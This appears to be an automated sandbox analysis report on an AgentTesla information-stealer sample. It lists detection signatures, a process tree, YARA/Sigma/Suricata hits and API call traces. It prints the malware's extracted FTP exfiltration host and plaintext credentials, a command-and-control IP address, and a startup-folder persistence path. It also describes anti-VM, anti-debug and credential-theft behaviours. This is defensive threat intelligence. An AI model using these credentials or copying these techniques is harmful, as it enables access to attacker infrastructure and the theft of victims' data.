Edit tour

Windows Analysis Report
28uMwHvbTD.exe

Overview

General Information

Sample name:	28uMwHvbTD.exe renamed because original name is a hash value
Original sample name:	97a8bf73809611ee4048adc2714685bd29bba3e677f5589b1053e30e0d98cf53.exe
Analysis ID:	1588176
MD5:	b12b444b2a02c69499aed36944384160
SHA1:	69c880815225de5db3927af16727020cc9d563d5
SHA256:	97a8bf73809611ee4048adc2714685bd29bba3e677f5589b1053e30e0d98cf53
Tags:	AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

28uMwHvbTD.exe (PID: 6076 cmdline: "C:\Users\user\Desktop\28uMwHvbTD.exe" MD5: B12B444B2A02C69499AED36944384160)

phagocytose.exe (PID: 4072 cmdline: "C:\Users\user\Desktop\28uMwHvbTD.exe" MD5: B12B444B2A02C69499AED36944384160)

RegSvcs.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\28uMwHvbTD.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 3716 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

phagocytose.exe (PID: 1212 cmdline: "C:\Users\user\AppData\Local\roundup\phagocytose.exe" MD5: B12B444B2A02C69499AED36944384160)

RegSvcs.exe (PID: 3376 cmdline: "C:\Users\user\AppData\Local\roundup\phagocytose.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1585828509.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2603734744.0000000002406000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: phagocytose.exe PID: 4072	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: phagocytose.exe PID: 4072	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: phagocytose.exe PID: 4072	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 6292	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 6292	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: phagocytose.exe PID: 1212	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: phagocytose.exe PID: 1212	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: phagocytose.exe PID: 1212	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 3376	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 3376	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
2.2.phagocytose.exe.10a0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.phagocytose.exe.10a0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.phagocytose.exe.10a0000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.phagocytose.exe.10a0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
2.2.phagocytose.exe.10a0000.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
2.2.phagocytose.exe.10a0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.phagocytose.exe.10a0000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
2.2.phagocytose.exe.10a0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32935:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x329a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32a31:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32ac3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32b2d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32b9f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32c35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32cc5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
2.2.phagocytose.exe.10a0000.1.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2fb6b:$s2: GetPrivateProfileString 0x2f218:$s3: get_OSFullName 0x30906:$s5: remove_Key 0x30ab3:$s5: remove_Key 0x31995:$s6: FtpWebRequest 0x32917:$s7: logins 0x32e89:$s7: logins 0x35b8e:$s7: logins 0x35c4c:$s7: logins 0x375a1:$s7: logins 0x367e6:$s9: 1.85 (Hash, version 2, native byte-order)
6.2.phagocytose.exe.40c0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.phagocytose.exe.40c0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.phagocytose.exe.40c0000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
6.2.phagocytose.exe.40c0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.phagocytose.exe.40c0000.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3196b:$s2: GetPrivateProfileString 0x31018:$s3: get_OSFullName 0x32706:$s5: remove_Key 0x328b3:$s5: remove_Key 0x33795:$s6: FtpWebRequest 0x34717:$s7: logins 0x34c89:$s7: logins 0x3798e:$s7: logins 0x37a4c:$s7: logins 0x393a1:$s7: logins 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
6.2.phagocytose.exe.40c0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.phagocytose.exe.40c0000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
6.2.phagocytose.exe.40c0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32935:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x329a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x32a31:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x32ac3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x32b2d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x32b9f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32c35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32cc5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
6.2.phagocytose.exe.40c0000.1.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2fb6b:$s2: GetPrivateProfileString 0x2f218:$s3: get_OSFullName 0x30906:$s5: remove_Key 0x30ab3:$s5: remove_Key 0x31995:$s6: FtpWebRequest 0x32917:$s7: logins 0x32e89:$s7: logins 0x35b8e:$s7: logins 0x35c4c:$s7: logins 0x375a1:$s7: logins 0x367e6:$s9: 1.85 (Hash, version 2, native byte-order)
Click to see the 18 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs" , ProcessId: 3716, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs" , ProcessId: 3716, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\roundup\phagocytose.exe, ProcessId: 4072, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\phagocytose.vbs

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:19:40.326284+0100	2029927	1	A Network Trojan was detected	192.168.2.9	49882	162.241.62.63	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T22:19:40.737107+0100	2855542	1	A Network Trojan was detected	192.168.2.9	49893	162.241.62.63	40112	TCP
2025-01-10T22:19:40.742576+0100	2855542	1	A Network Trojan was detected	192.168.2.9	49893	162.241.62.63	40112	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 2.2.phagocytose.exe.10a0000.1.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe

ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: 28uMwHvbTD.exe	Virustotal: Detection: 81%			Perma Link
Source: 28uMwHvbTD.exe	ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 28uMwHvbTD.exe

Joe Sandbox ML: detected

Source: 28uMwHvbTD.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: phagocytose.exe, 00000002.00000003.1424365471.0000000003940000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000002.00000003.1421913115.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579623639.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579930343.0000000004100000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: phagocytose.exe, 00000002.00000003.1424365471.0000000003940000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000002.00000003.1421913115.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579623639.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000003.1579930343.0000000004100000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007A445A
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AC6D1 FindFirstFileW,FindClose,	0_2_007AC6D1
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007AC75C
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AEF95
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007AF0F2
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007AF3F3
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A37EF
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_007A3B12
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007ABCBC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00E8445A
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8C6D1 FindFirstFileW,FindClose,	2_2_00E8C6D1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00E8C75C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00E8EF95
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00E8F0F2
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00E8F3F3
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00E837EF
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00E83B12
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00E8BCBC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00E8445A
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8C6D1 FindFirstFileW,FindClose,	6_2_00E8C6D1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_00E8C75C
